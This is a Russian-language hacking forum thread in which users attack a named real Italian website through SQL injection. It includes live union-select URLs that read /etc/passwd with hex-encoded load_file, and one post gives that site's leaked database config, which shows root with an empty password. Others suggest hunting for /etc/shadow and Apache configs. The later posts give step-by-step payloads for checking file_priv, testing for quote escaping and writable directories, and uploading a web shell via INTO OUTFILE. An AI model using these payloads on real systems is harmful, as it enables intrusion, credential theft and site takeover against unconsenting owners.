etc/passwd
 

Нашел на сайте SQL- иньекцию...
Но захотелось познать новое и папробывал сделать вот так: http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2f6574632f70617 3737764),5,6,7,8/*
Скажите, что можно такого полезного узнать из этого и как играть с дирами?
P.S если поможете- поставлю "+" =))

в /etc/passwd в большинстве случаев хранится только логин-лист и все, ищи конфиги апача или фтп, может и найдешь что полезного

А как искать-то? я же незнаю другие диры..

Если админ - лох, то можно попробывать заглянуть в etc/shadow

А если не лох?

Я статью писал раскрытие пути.
Найди почитай.
Раздел Наши статьи.

Ссылку не скинешь?

если есть привилегии file, значит можно залить шелл через into outfile. почитай статьи на тему

Что бы узнать содержимое /etc/passwd- я переводил в HEX, а то бы залить шелл надо переводить в HEX ?

Шелл ты не зальешь, там экранирование кавычек

А вообще...надо переводить в Hex или нет?

Только когда фильтрует.

данные можешь перекодировать в хекс, но тем не менее, тубу нужно будет указывать путь (inset into '/var/file.php') путь должен быть в кавычках.

А ковычки закодировать можно?

все можно

А как кодируется ковычка?

Да и мне вообще был не интересно...
Какие директории известны миру, по которым можно путешевствовать))?
Желатьно, что бы найти что-нибудь хорошее...

0x27/ Пользуйся WinHex

Посмотри раздел PHP инжекции.

Я на каком-то форуме (может даже и на этом) видел список всех полезныйх директорий при PHP- инклюдинге...
Но счас не могу не найти((
Не подскажите..пожалуйста))

В большинстве своём - это версии ядер 2.4.х и 2.6.х. Linux. В старых версиях (2.2.х и младше) пароли хранились в DES прямо в /etc/passwd

http://forum.antichat.ru/thread49775.html

И как там "путешествовать"? Я пробыал почти что все, но он не пишет не ошибку...и ничего не выводит....скажи почему

или /etc/master.passwd если это ФРЯ

да врятли получится, прав не хватит

>Если админ - лох, то можно попробывать заглянуть в etc/shadow
Если админ лох, то тем не менее не думаю что он будет выставлять права на чтение=\

угу, это надо специально ведь выставлять, хотя мож в бэкапах какихнить и т.п. и можно найти жаль только это не фря
а админа супер секурным тоже назвать нельзя
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';

// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";

вобщем надо или httpd.conf (vhosts.conf) искать и там искать сайтенги на которых что нить типа phpmyadmin установлен

или просто аккаунт админа из скули выжимать, благо дело таблички есть (даже с префиксом)

А где ты взял этот PHP код))?

при неправидьном запросе происходит ошибка с раскрытием путей (показывается имя скрипта с ошибкой и путь до него)можно предположить, что гдето есть файл index.php, вместо show.func.php подставляем index.php и кодируем в хекс, полученный результат подставляем в sql запрос в функцию load_file() получаем:смотрим исходный код страницы и видим часть скрипта index.php, а имменно строчкуподставляем закодированный в хекс аргумент функции include() в наш запрос, вместо index.php получаем:смотрим исходный код, видим строчку:подставляем закодированный в хекс аргумент функции include() в наш запрос, вместо config.inc.php получаем:смотрим исходный код, видим:

Кодирование кавычки не поможет в заливке шелла. При указании полного пути в конструкции INTO OUTFILE требуеться обрамлять его кавычками не закодированными. Короче при magic_quotes_gpc=on шелл через скуль не залить.
Нащет того, лох или наоброт не лох админ - лично мне никогда не встречался сервак, где веб сервер (или PHP если он не как модуль сервера) имеет привелегии рута (а ведь только он может читать shadow).

Сколько не находил сайтов с скулями... Сколько их не раскуручивал так и не нашел,где через скулю моно шелл залить... я правильно запрос составляю?
http://ste.ru/news.php?id=-1+union+select+1,2,3,4,'shell',6,7+from+mysql.user +into+outfile+'путь к сайту'/* Правильно все?

Ну так-то да, но смотря что такое "shell", что значит "путь к сайту", есть ли file_priv, доступна ли запись в дирректорию, и не экранируются-ли ковычки :)

Есть ли все из тобою перечисленного есть, то шелл зальется? А сейчас такие сайты остались? - просто я не встречал... а путь к таблице обязательно нуежен))?
Ответь, пожалуйста на все вопросы)

1 Файл прив
Проверям либо так :
union+select+file_priv+from+mysql.user+where+user= 'имя юзера под которым у тебя база' тоесть user()

Либо так:1+union+select+1,2,3,4,LOAD_FILE('/etc/passwd')/* <-- сдесь убиваем сразу двух зайцев, если файл читается, значит ковычки не экранируются

Ковычки можно проверить так-же вот как:
1+union+select+1,'2',3,4/*
если вывод есть, всё нормально

2 Далее, директория на запись:
1+union+select+1,2,3,4,'11111'+from+table+into+out file+'/bla/bla/site.ru/bla/111.txt'/*
(указывать +from+table нужно только для старых версий мускула)

Затем обращаемся к файлу через веб:
http://site.ru/bla/111.txt
и если видим наше 11111, то всё хорошо, дирректория доступна на запись.

3 Ну и собственно льём.
1+union+select+1,2,3,4,'код шелла'+from+table+into+outfile+' /bla/bla/site.ru/bla/111.php'/*
Шелл по адресу http://site.ru/bla/111.php
Сейчас такие сайты конечно-же остались, просто их мало :)